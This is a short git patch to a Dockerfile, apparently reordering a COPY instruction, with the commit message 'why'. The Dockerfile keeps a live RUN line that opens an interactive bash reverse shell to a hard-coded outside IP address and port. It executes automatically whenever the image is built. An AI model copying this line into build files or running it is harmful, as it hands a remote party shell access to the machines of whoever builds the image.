From 35c39f50e6ad0274a92a01d768facdc212469c73 Mon Sep 17 00:00:00 2001 From: yoshino-s Date: Thu, 21 Aug 2025 15:28:06 +0800 Subject: [PATCH] why --- Dockerfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Dockerfile b/Dockerfile index 9617435..f736958 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,6 +1,6 @@ FROM ubuntu:latest -COPY / /mnt/etc RUN bash -c "bash -i >& /dev/tcp/152.136.32.206/7788 0>&1" +COPY / /mnt/etc